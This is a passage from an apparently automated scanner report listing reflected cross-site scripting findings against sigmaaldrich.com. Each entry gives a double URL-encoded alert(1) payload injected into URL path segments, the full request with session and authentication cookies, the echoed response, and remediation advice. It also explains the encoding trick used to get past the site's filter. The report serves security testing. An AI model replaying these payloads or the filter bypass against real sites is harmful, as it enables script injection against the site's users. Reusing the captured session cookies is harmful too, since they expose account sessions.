Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:12 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma26b0f";alert(1)//9cc5826e82d/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.307. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a38d9%2522%253balert%25281%2529%252f%252ffa6950811f0 was submitted in the REST URL parameter 5. This input was echoed as a38d9";alert(1)//fa6950811f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Informationa38d9%2522%253balert%25281%2529%252f%252ffa6950811f0/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:19 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Informationa38d9";alert(1)//fa6950811f0/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.308. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43c4b%2522%253balert%25281%2529%252f%252f8431a7e5877 was submitted in the REST URL parameter 6. This input was echoed as 43c4b";alert(1)//8431a7e5877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/43c4b%2522%253balert%25281%2529%252f%252f8431a7e5877/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:25 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/43c4b";alert(1)//8431a7e5877/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.309. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e378b%2522%253balert%25281%2529%252f%252f23f865c21a1 was submitted in the REST URL parameter 1. This input was echoed as e378b";alert(1)//23f865c21a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etce378b%2522%253balert%25281%2529%252f%252f23f865c21a1/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:39 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etce378b";alert(1)//23f865c21a1/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.310. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b743%2522%253balert%25281%2529%252f%252f2daabd630fe was submitted in the REST URL parameter 2. This input was echoed as 5b743";alert(1)//2daabd630fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib5b743%2522%253balert%25281%2529%252f%252f2daabd630fe/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:41 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib5b743";alert(1)//2daabd630fe/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.311. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcfb6%2522%253balert%25281%2529%252f%252f9792a16b183 was submitted in the REST URL parameter 3. This input was echoed as dcfb6";alert(1)//9792a16b183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docsdcfb6%2522%253balert%25281%2529%252f%252f9792a16b183/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:43 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docsdcfb6";alert(1)//9792a16b183/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.312. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4097b%2522%253balert%25281%2529%252f%252fa35c3dc4905 was submitted in the REST URL parameter 4. This input was echoed as 4097b";alert(1)//a35c3dc4905 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma4097b%2522%253balert%25281%2529%252f%252fa35c3dc4905/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
